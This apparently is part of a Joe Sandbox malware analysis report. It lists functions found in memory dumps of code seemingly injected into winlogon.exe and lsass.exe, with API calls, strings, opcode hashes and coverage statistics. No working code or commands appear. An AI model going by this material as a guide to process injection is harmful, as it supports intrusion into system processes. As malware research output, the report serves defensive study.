Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 010840aab30206d9dde1e5c38ccd121aa0ffac0a021a8112b734b15917e30bc3
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: C9F0FE613656C691EB554B62E8983652760BB48BD0F46202F951F85667DF38C8CCCF31

Function 000002E991760860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000002E9917608A2
GetConsoleMode.KERNEL32 ref: 000002E991760960
GetLastError.KERNEL32 ref: 000002E9917609EA

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: d91a74972d3addb8ca59853685c5d2fbb860ea84511e9225b42e499cef52e57b
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 2881A4226906D689F7509F66D8483AD27A1F744BC4F46421FDE0AD3B9BDB3484C5CB32

Function 000002E9917557F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002E991755806

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
Instruction ID: 6ba39a3f7beec29c8b45d62e6135430484392ab18ebf7e837b9564d638d1a982
Opcode Fuzzy Hash: 391bdceae7d8abe40659ce668f338d58b4ab221fc177ec12fd98c8e388539aa3
Instruction Fuzzy Hash: B161BA36559BC5C6E7608B16E45831EB7A0F388794F52011AEACD87BA9DB7CC980CF50

Function 000002E9917912B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002E9917912E0
_set_statfp.LIBCMT ref: 000002E9917912FB
_set_statfp.LIBCMT ref: 000002E991791317
_set_statfp.LIBCMT ref: 000002E991791353

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: ed2b934100f97afa977e39f1fd6ac49cf20b2c536a150e52cfc2945855d0b986
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C61140226C4EC301FB541167E45D36900A0BB54376F4B463FEA7F06BE78E184DEA4930

Function 000002E9917312B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002E9917312E0
_set_statfp.LIBCMT ref: 000002E9917312FB
_set_statfp.LIBCMT ref: 000002E991731317
_set_statfp.LIBCMT ref: 000002E991731353

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 14295e7fc7057082f756038696b181797a2604b88226c85cc6d8bcc6c0bd7719
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: C3117362AD4A9301F6641167F55E36913817B54374F4B463EAA7706BDF8E288FC34930

Function 000002E991761EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000002E991761EE0
_set_statfp.LIBCMT ref: 000002E991761EFB
_set_statfp.LIBCMT ref: 000002E991761F17
_set_statfp.LIBCMT ref: 000002E991761F53

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 11befe631739a896dde1201fc855ba315837a2f3c6c9f2ca9294bb3b0ddd3fe6
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 1111A322AD9A8301F6981166E46E3AD21507BF43F4F07463EEA77867E78B548CC14A22

Function 000002E991759658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002E991759677
SetLastError.KERNEL32 ref: 000002E9917596FE

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction ID: d2b575e9bd7aec25d60299338e0f481a2a7986a84132ba62cfa286d4e1bd523b
Opcode Fuzzy Hash: 7802049b4883bf50180bab68563004ea007fb3dc3120036de214afe70cc89c3c
Instruction Fuzzy Hash: C6117F202A52C382FE149727E84C3752291BB847E0F0A462ED966573DBDB38C8C6CE30

Function 000002E9917884F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991788503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991788598

Strings

csm, xrefs: 000002E99178857E
f, xrefs: 000002E991788516

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 536bb603fbe19da4021b5d9ed336ddfc109c4d0459fb01cd42cf425b880ebbff
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 5151B2327526828BFB14DF17E488B193395F340B98F62816BDA1A4778ADB34C9C1CB24

Function 000002E9917284F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991728503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991728598

Strings

f, xrefs: 000002E991728516
csm, xrefs: 000002E99172857E

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 8085851e88a6e7281abd615f9640dd0b36aa95edc266ba20189aaac5d140ce3c
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 2951B5323536828AD724CF17E448B1833D5F354B98F52892ADA464774AD736C9C2CF24

Function 000002E9917884D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991788503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991788598

Strings

csm, xrefs: 000002E99178857E
f, xrefs: 000002E991788516

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 8c9fbcc44401d53b7cee33deabdd09b265d515de1b2020a9f8bd5eb34ed83011
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 0531A27125168287F714DF13E88871937A4F740BD8F26805FAE5A0774ACB38C981CB24

Function 000002E9917284D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002E991728503
_IsNonwritableInCurrentImage.LIBCMT ref: 000002E991728598

Strings

f, xrefs: 000002E991728516
csm, xrefs: 000002E99172857E

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 22b79d110ea7db6a52cfccea508c33ed5550232c45d3a439089f2dac9a8f1e29
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 5A31B67225278186E714DF13E84871937D4F750BD8F26841EEE574774ACB3ACA82CB64

Function 000002E9917514B4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E9917514D5
HeapFree.KERNEL32 ref: 000002E9917514E4
GetProcessHeap.KERNEL32 ref: 000002E9917514F0
HeapFree.KERNEL32 ref: 000002E9917514FF
GetProcessHeap.KERNEL32 ref: 000002E99175152A

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction ID: ea355e91a04b901e72b3f74cb420232f01c1460e508f98bf1fb30d8e3dd39035
Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
Instruction Fuzzy Hash: 9C111832655F89D2EB589F67E84821A7770F78AB84F05402AEB8E53716DF38C091CB61

Function 000002E9917526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917527D4
StrCpyW.SHLWAPI ref: 000002E9917527ED

Strings

\\.\pipe\, xrefs: 000002E9917527DF

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: d7e6de7e2a15e02e03db9e345b7c4e2d2ee15705448f3fbc566941e3b102550c
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 0C71A2322847C286EB649F67D9483AA67A0F744BC4F46001FDD4957B9ADF35CA84CB60

Function 000002E9917524DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002E9917525C3
StrCpyW.SHLWAPI ref: 000002E9917525DA

Strings

\\.\pipe\, xrefs: 000002E9917525CE

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: e46a457bda775b18bb9ebc57d715825d724901b28845aabb4b9f333315636edb
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 2C51C3263987C2C2E6649A2BE55C36A6691F385780F16002FD98A43FABCF35C4858F70

Function 000002E991760604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002E99176071B
GetLastError.KERNEL32 ref: 000002E99176073D

Strings

U, xrefs: 000002E9917606C7

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 35b4963ba83091f15b9151213f3c930b53f3aee8ecac79b1adcd3abd4d7943bc
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: C941A372314A8181EB209F26E44839A77A1F7987C4F52402AEE4DC7799EB3CC585CF61

Function 000002E99175D6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002E99175D6F9
LCMapStringW.KERNEL32 ref: 000002E99175D781

Strings

LCMapStringEx, xrefs: 000002E99175D6DC, 000002E99175D6ED

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: e970a9a43252eabe4026e981e98462d928581c4f7ecabb01d41ac0a41422b202
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: C9111A36608BC186D764CB16F44429AB7A5F7C9BD0F54412AEE8D83B5ADF38C490CF10

Function 000002E9917594A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002E9917594E8
RaiseException.KERNEL32 ref: 000002E99175952E

Strings

csm, xrefs: 000002E99175951B

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 27ad33a178c3179211db166796635154f32230ec8d19586fae6dd97a3da5b9d2
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: C2115132218BC582EB608F16F44436977A0F788B98F19422ADF8D07765DF3CC991CB10

Function 000002E99175D65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002E99175D68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000002E99175D6A7

Strings

InitializeCriticalSectionEx, xrefs: 000002E99175D681

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 812ea173a3d6579247d231d3f10f819a0e9ab9d21a9d756a00f462390e53500e
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: E5F082217647C191EB059B43F4486956721FB88BD0F4A502BAA5E43B56CF38C9D5CF31

Function 000002E99178CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002E99178CBC5

Strings

October, xrefs: 000002E99178CBBE
November, xrefs: 000002E99178CBA8, 000002E99178CBB2

Memory Dump Source

Source File: 00000013.00000002.2686009347.000002E991780000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991780000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 75bb176bec5a7995b01361e88268d9f26a36d38c58ddc318ebdf1d762285d409
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: D5E09B613805C391FA059753F58D2D42251F744744F5B506B962D06257CF38C8CA8B60

Function 000002E99172CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002E99172CBC5

Strings

November, xrefs: 000002E99172CBA8, 000002E99172CBB2
October, xrefs: 000002E99172CBBE

Memory Dump Source

Source File: 00000013.00000002.2684384401.000002E991720000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991720000_winlogon.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: e24e2784e8acbe38f7e01e8af0d934bc7b84b0593c2869dacb804e5941c5eac0
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: C2E092613829C792FF0A9B53F44C2E42261BB98740F5B552B962A06257CF38CAD78B30

Function 000002E99175D608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000002E99175D631
TlsSetValue.KERNEL32 ref: 000002E99175D648

Strings

FlsSetValue, xrefs: 000002E99175D61E

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 5fb10effba1df8d56895d206b50cf73f54771176c0a446976a8d18c6a2348832
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 31E06D617646C291EA054B53F84D6942222BB887C0F4A402BDA0A46357CF38C8D5CF32

Function 000002E991751D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E991751D9B
HeapAlloc.KERNEL32 ref: 000002E991751DAA
GetProcessHeap.KERNEL32 ref: 000002E991751E1E
HeapFree.KERNEL32 ref: 000002E991751E2C

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 8e675e63a18b3d2e0f4bfffe7c2fff3115d9074265ab9aa8a56be4a5a175b3da
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 34219522745FC5C2EB118F5AE40825AF3A0FB89BD5F16411ADE8D97B16EF78C582CB10

Function 000002E991751274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002E99175127A
HeapAlloc.KERNEL32 ref: 000002E991751289
GetProcessHeap.KERNEL32 ref: 000002E9917512A3
HeapAlloc.KERNEL32 ref: 000002E9917512B4

Memory Dump Source

Source File: 00000013.00000002.2684749223.000002E991750000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 5bac14118ec26c9123086b6f7a104a73f0c5a4fcf2ba36b914a97d33eb5ad182
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: CCE03971751A45C6E7088B63D80834936F1FB89B82F4A8028C90947351DF7D84D9CB61

Analysis Process: lsass.exePID: 640, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	141
Total number of Limit Nodes:	10

Executed Functions

Function 00000213BDCE26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 00000213BDCE27D4
StrCpyW.SHLWAPI ref: 00000213BDCE27ED

Strings

\\.\pipe\, xrefs: 00000213BDCE27DF

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 958862e6774dca66b089c5131744cdd14b4e746f1ef3526f130444605cf24069
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 4B71C5B2208B8943EF38DF25D9483EAA796F768B8CF441136DD4947B89EE36D7058700

Function 00000213BDCE21CC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 00000213BDCE2270

Part of subcall function 00000213BDCE30B4: GetProcessHeap.KERNEL32 ref: 00000213BDCE30D7
Part of subcall function 00000213BDCE30B4: HeapAlloc.KERNEL32 ref: 00000213BDCE30EA
Part of subcall function 00000213BDCE30B4: StrCmpNIW.SHLWAPI ref: 00000213BDCE316B
Part of subcall function 00000213BDCE30B4: GetProcessHeap.KERNEL32 ref: 00000213BDCE31D1
Part of subcall function 00000213BDCE30B4: HeapFree.KERNEL32 ref: 00000213BDCE31DF

Strings

dialer, xrefs: 00000213BDCE2269
S, xrefs: 00000213BDCE2391

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction ID: 3a2d983b68ad83ed8bba0886a699d0eb8f38031532de1a7e1fabcf3a0e442ea7
Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
Instruction Fuzzy Hash: DA51C3B2B1472883EF61CF21D8487EDA3A6F72879CF449421DE4526B45EB36EB51C710

Function 00000213BDCE1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000213BDCE1AD8
StrCmpNIW.SHLWAPI ref: 00000213BDCE1AF2
lstrlenW.KERNEL32 ref: 00000213BDCE1B01
StrCpyW.SHLWAPI ref: 00000213BDCE1B16

Strings

\\?\, xrefs: 00000213BDCE1AE6

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 325ced8bc4b10fe40afa27ed344ff8a600cd24f0b2f34a19bded33e849df5107
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 99F044B2308A45A2EF60CB21F4983D96762F764B8CF849031CA494A558FF3DC74DC700

Function 00000213BDCE0346 Relevance: 6.0, APIs: 4, Instructions: 1034
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE1006
HeapAlloc.KERNEL32 ref: 00000213BDCE1015
GetProcessHeap.KERNEL32 ref: 00000213BDCE1028
HeapAlloc.KERNEL32 ref: 00000213BDCE1037

Memory Dump Source

Source File: 00000016.00000002.2709186893.00000213BDCE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_213bdce0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction ID: 59b5f99c823a3c1f80f8cb939782ca9080515687d05920005cded5b386632710
Opcode Fuzzy Hash: da3653941ee27b4032445f916b986651388196774474ecb5996340d1f59d089c
Instruction Fuzzy Hash: 37F04F6251ABC09BD7068B6188142D97FB1F78AF04F89C156C64487352DA3D8599C711

Function 00000213BDCE1000 Relevance: 5.0, APIs: 4, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00000213BDCE1006
HeapAlloc.KERNEL32 ref: 00000213BDCE1015
GetProcessHeap.KERNEL32 ref: 00000213BDCE1028
